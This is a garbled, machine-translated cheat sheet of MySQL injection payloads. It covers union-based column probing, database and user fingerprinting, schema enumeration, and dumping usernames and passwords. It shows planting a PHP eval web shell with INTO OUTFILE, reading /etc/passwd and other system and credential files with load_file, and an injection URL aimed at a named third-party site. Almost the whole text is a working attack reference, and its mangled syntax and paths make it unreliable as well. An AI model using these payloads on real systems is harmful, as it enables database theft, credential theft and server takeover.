MYSQL injection statement Accumulation

/* Confirm the database type (only MYSQL parsing /*)
 
 
And ord (mid (version (), 4.0)> 51/* confirm that the database version 51 is ASCII code 3 is correct.> 4.0 error <
 
 
Union select, 1, *** returns the number of correct validation Fields
 
Order by 13 returns the last correct number of fields
 

Union select 1, 2, 3, 4, *** 11, 12, 13 from admin returns the correct result. If the admin table name is assumed to have a number 2
 
Union select 1, version (), 3, *** 13 from admin brute-force database version
 
Union select 1, username, 3, *** 13 from admin brute-force account/Password
 
Union select 1, username, 3, *** 13 from admin where id = 2 violence admin table 2nd user primary key is ID
 
And ord (mid (user (), 144) =/* determine whether the ROOT permission returns the correct existence

 
 
Violent Field Length
 
Order by num /*
 
 
Matching Field
 
And 1 = 1 union select 1, 2, 4, 5 ....... N /*
 
 
Violent field location
 
And 1 = 2 union select 1, 2, 3, 4, 5 ..... N /*
 
Using built-in function brute-force database information
 
Version () database () user ()
 
You do not need to guess the available field brute-force database information (some websites are not applicable ):
 
And 1 = 2 union all select version ()/*
 
And 1 = 2 union all select database ()/*
 
And 1 = 2 union all select user ()/*
 
Operating system information:
 
And 1 = 2 union all select @ global. version_compile_ OS from mysql. user /*
 
Database permissions:
 
And ord (mid (user (), 114) =/* return normal description as root
 
Brute-force database (mysql> 5.0)
 
Mysql 5 and above have the built-in database information_schema, which stores all the database and table structure information of mysql.
 
And 1 = 2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema.SCHEMATA limit 0, 1
 
 
Guess table
 
And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA = database (hexadecimal) limit 0 (start record, 0 is the first start record), 1 (display 1 record )-
 
 
Guess Field
 
And 1 = 2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME = table name (hexadecimal) limit 0, 1
 
 
Brute force password
 
And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1
 
Advanced usage (two data contents are displayed for one available field ):
 
Union select 1, 2, 3 concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1
 
Write horse directly (Root permission)
 
Condition: 1. Know the physical path of the site
 
2. Have sufficient permissions (you can use select .... From mysql. user test)
 
3. magic_quotes_gpc () = OFF
 
Select '<? Php eval ($ _ POST [cmd])?> Into outfile 'physical path
 
And 1 = 2 union all select one sentence HEX value into outfile path
 
 
Load_file () common paths:
 
 
1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)
2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items show the full code in a PHP file. Sometimes some characters are not replaced. For example, "<" is replaced with "space" and the webpage is returned. The Code cannot be viewed.
3. load_file (char (47) can be used to list the root directories of FreeBSD and Sunos systems.
4. view the configuration file of the linux APACHE Virtual Host in/etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf.
5. Run c: Program FilesApache GroupApacheconf httpd. conf or C: apacheconf httpd. conf to view the apache file in WINDOWS.
6. Run c:/Resin-3.0.14/conf/resin. conf to view the resin file configuration of the website developed by jsp.
7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf
8. d: APACHEApache2confhttpd. conf
9. C: Program Filesmysqlmy. ini
10../themes/darkblue_orange/layout. inc. php phpmyadmin burst path
11. c: windowssystem32inetsrvMetaBase. xml: view the virtual host configuration file of IIS
12. view the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/conf/RESIN. conf.
13./usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above.
14./usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe vm View
15. View firewall policies in/etc/sysconfig/iptables.
16. Equivalent settings of usr/local/app/php5 B/php. ini PHP
17./etc/my. cnf MYSQL configuration file
18. System Version of/etc/redhat-release Red Hat
19. C: mysqldatamysqluser. MYD has the user password in MYSQL.
20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.
21./usr/local/app/php5 B/php. ini // PHP settings
22./usr/local/app/apache2/conf/extra tpd-vhosts.conf // virtual website settings
23. C: Program FilesRhinoSoft. comServ-UServUDaemon.ini
24. c: windowsmy. ini
25. c: oot. ini
 
Common website configuration files: config. inc. php and config. php. Replace (load_file (HEX), char (60), char (32) must be used for load_file ))
 
Note:
 
Char (60) indicates <
 
Char (32) indicates space
 
 
Problems with manual injection:
 
After the injection, the page displays:
 
Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation UNION
 
Such as: http://www.bkjia.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20
 
This is caused by inconsistent pre-and post-encoding,
 
Solution: Add unhex (hex (parameter) before the parameter. The above URL can be changed:
 
Http://www.bkjia.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3, 4, unhex (hex (user () % 20
 
You can continue the injection.